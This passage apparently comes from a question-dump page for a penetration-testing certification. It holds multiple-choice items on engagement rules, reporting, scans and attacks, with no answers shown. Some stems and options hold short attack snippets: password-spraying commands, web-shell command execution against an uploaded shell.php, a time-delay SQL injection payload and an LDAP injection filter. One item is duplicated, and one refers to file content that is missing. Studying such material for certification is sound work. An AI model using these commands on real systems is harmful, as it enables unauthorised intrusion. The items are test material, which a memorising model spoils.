Immediately contact the client.

D.  

Record the findings in the penetration test report.

Discussion 0
Questions 96

Which of the following assessment methods is the most likely to cause harm to an ICS environment?

Options:

A.  

Active scanning

B.  

Ping sweep

C.  

Protocol reversing

D.  

Packet analysis

Discussion 0
Questions 97

During a client engagement, a penetration tester runs the following Nmap command and obtains the following output:

nmap -sV -- script ssl-enum-ciphers -p 443 remotehost

| TLS_ECDHE_ECDSA_WITH_RC4_128_SHA

| TLS_ECDHE_RSA_WITH_RC4_128_SHA

TLS_RSA_WITH_RC4_128_SHA (rsa 2048)

TLS_RSA_WITH_RC4_128_MD5 (rsa 2048)

Which of the following should the penetration tester include in the report?

Options:

A.  

Old, insecure ciphers are in use.

B.  

The 3DES algorithm should be deprecated.

C.  

2,048-bit symmetric keys are incompatible with MD5.

D.  

This server should be upgraded to TLS 1.2.

Discussion 0
Questions 98

Which of the following best explains why communication is a vital phase of a penetration test?

Options:

A.  

To discuss situational awareness

B.  

To build rapport with the emergency contact

C.  

To explain the data destruction process

D.  

To ensure the likelihood of future assessments

Discussion 0
Questions 99

A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?

Options:

A.  

Manually check the version number of the VoIP service against the CVE release

B.  

Test with proof-of-concept code from an exploit database

C.  

Review SIP traffic from an on-path position to look for indicators of compromise

D.  

Utilize an nmap –sV scan against the service

Discussion 0
Questions 100

A penetration tester wants to find the password for any account in the domain without locking any of the accounts. Which of the following commands should the tester use?

Options:

A.  

enum4linux -u userl -p /passwordList.txt 192.168.0.1

B.  

enum4linux -u userl -p Passwordl 192.168.0.1

C.  

cme smb 192.168.0.0/24 -u /userList.txt -p /passwordList.txt

D.  

cme smb 192.168.0.0/24 -u /userList.txt -p Summer123

Discussion 0
Questions 101

During a security assessment of a web application, a penetration tester was able to generate the following application response:

Unclosed quotation mark after the character string Incorrect syntax near ".

Which of the following is the most probable finding?

Options:

A.  

SQL injection

B.  

Cross-site scripting

C.  

Business logic flaw

D.  

Race condition

Discussion 0
Questions 102

During an assessment, a penetration tester discovers the following code sample in a web application:

"(&(userid=*)(userid=*))(I(userid=*)(userPwd=(SHAl}a9993e364706816aba3e25717850c26c9cd0d89d==))

Which of the following injections is being performed?

Options:

A.  

Boolean SQL

B.  

Command

C.  

Blind SQL

D.  

LDAP

Discussion 0
Questions 103

A penetration tester requested, without express authorization, that a CVE number be assigned for a new vulnerability found on an internal client application. Which of the following did the penetration tester most likely breach?

Options:

A.  

ROE

B.  

SLA

C.  

NDA

D.  

SOW

Discussion 0
Questions 104

Which of the following tools would be the best to use to intercept an HTTP response at an API, change its content, and forward it back to the origin mobile device?

Options:

A.  

Drozer

B.  

Burp Suite

C.  

Android SDK Tools

D.  

MobSF

Discussion 0
Questions 105

A penetration tester is conducting a test after hours and notices a critical system was taken down. Which of the following contacts should be notified first?

Options:

A.  

Secondary

B.  

Emergency

C.  

Technical

D.  

Primary

Discussion 0
Questions 106

Which of the following members of a client organization are most likely authorized to provide a signed authorization letter prior to the start date of a penetration test?

Options:

A.  

The IT department

B.  

The executive management team and legal personnel

C.  

Organizational security personnel

D.  

The human resources team

Discussion 0
Questions 107

After performing a web penetration test, a security consultant is ranking the findings by criticality. Which of the following standards or methodologies would be best for the consultant to use for reference?

Options:

A.  

OWASP

B.  

MITRE ATT&CK

C.  

PTES

D.  

NIST

Discussion 0
Questions 108

A penetration tester requested, without express authorization, that a CVE number be assigned for a new vulnerability found on an internal client application. Which of the following did the penetration tester most likely breach?

Options:

A.  

ROE

B.  

SLA

C.  

NDA

D.  

SOW

Discussion 0
Questions 109

The results of an Nmap scan are as follows:

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 01:10 EST

Nmap scan report for ( 10.2.1.22 )

Host is up (0.0102s latency).

Not shown: 998 filtered ports

Port State Service

80/tcp open http

|_http-title: 80F 22% RH 1009.1MB (text/html)

|_http-slowloris-check:

| VULNERABLE:

| Slowloris DoS Attack

| <..>

Device type: bridge|general purpose

Running (JUST GUESSING) : QEMU (95%)

OS CPE: cpe:/a:qemu:qemu

No exact OS matches found for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at https://nmap.org/submit/.

Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds

Which of the following device types will MOST likely have a similar response? (Choose two.)

Options:

A.  

Network device

B.  

Public-facing web server

C.  

Active Directory domain controller

D.  

IoT/embedded device

E.  

Exposed RDP

F.  

Print queue

Discussion 0
Questions 110

A penetration tester discovers passwords in a publicly available data breach during the reconnaissance phase of the penetration test. Which of the following is the best action for the tester to take?

Options:

A.  

Add thepasswords to an appendix in the penetration test report.

B.  

Do nothing. Using passwords from breached data is unethical.

C.  

Contactthe client and inform them of the breach.

D.  

Use thepasswords in a credential stuffing attack when the external penetration test begins.

Discussion 0
Questions 111

During an engagement, a penetration tester was able to upload to a server a PHP file with the following content:

Which of the following commands should the penetration tester run to successfully achieve RCE?

Options:

A.  

python3 -c "import requests;print (requests.post (url='http://172.16.200.10/uploads/shell.php ', data={'cmd=id'}))"

B.  

python3 -c "import requests;print (requests.post(url='http://172.16.200.10/uploads/shell.php ', data=

('cmd':'id') ) .text) "

C.  

python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php ', params=

{'cmd':'id'}) )"

D.  

python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php ', params=

('cmd':'id'}) .text) "

Discussion 0
Questions 112

Which of the following describes a globally accessible knowledge base of adversary tactics and techniques based on real-world observations?

Options:

A.  

OWASP Top 10

B.  

MITRE ATT&CK

C.  

Cyber Kill Chain

D.  

Well-Architected Framework

Discussion 0
Questions 113

A penetration tester managed to exploit a vulnerability using the following payload:

IF (1=1) WAIT FOR DELAY '0:0:15'

Which of the following actions would best mitigate this type ol attack?

Options:

A.  

Encrypting passwords

B.  

Parameterizing queries

C.  

Encoding output

D.  

Sanitizing HTML

Discussion 0
Questions 114

A penetration tester is testing a company's public API and discovers that specific input allows the execution of arbitrary commands on the base operating system. Which of the following actions should the penetration tester take next?

Options:

A.  

Include the findings in the final report.

B.  

Notify the client immediately.

C.  

Document which commands can be executed.

D.  

Use this feature to further compromise the server.

Discussion 0
Questions 115

A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:

[ATTEMPT] target 192.168.1.112 - login "root" - pass "abcde"

[ATTEMPT] target 192.168.1.112 - login "root" - pass "edcfg"

[ATTEMPT] target 192.168.1.112 - login "root" - pass "qazsw"

[ATTEMPT] target 192.168.1.112 - login "root" – pass “tyuio”

Which of the following is the penetration tester conducting?

Options:

A.  

Port scan

B.  

Brute force

C.  

Credential stuffing

D.  

DoS attack

Discussion 0
Questions 116

Which of the following tools would help a penetration tester locate a file that was uploaded to a content management system?

Options:

A.  

DirBuster

B.  

Open VAS

C.  

Scout Suite

D.  

CeWL

Discussion 0
Questions 117

A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

Options:

A.  

Ensure the client has signed the SOW.

B.  

Verify the client has granted network access to the hot site.

C.  

Determine if the failover environment relies on resources not owned by the client.

D.  

Establish communication and escalation procedures with the client.

Discussion 0
Questions 118

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

Options:

A.  

NDA

B.  

MSA

C.  

SOW

D.  

MOU

Discussion 0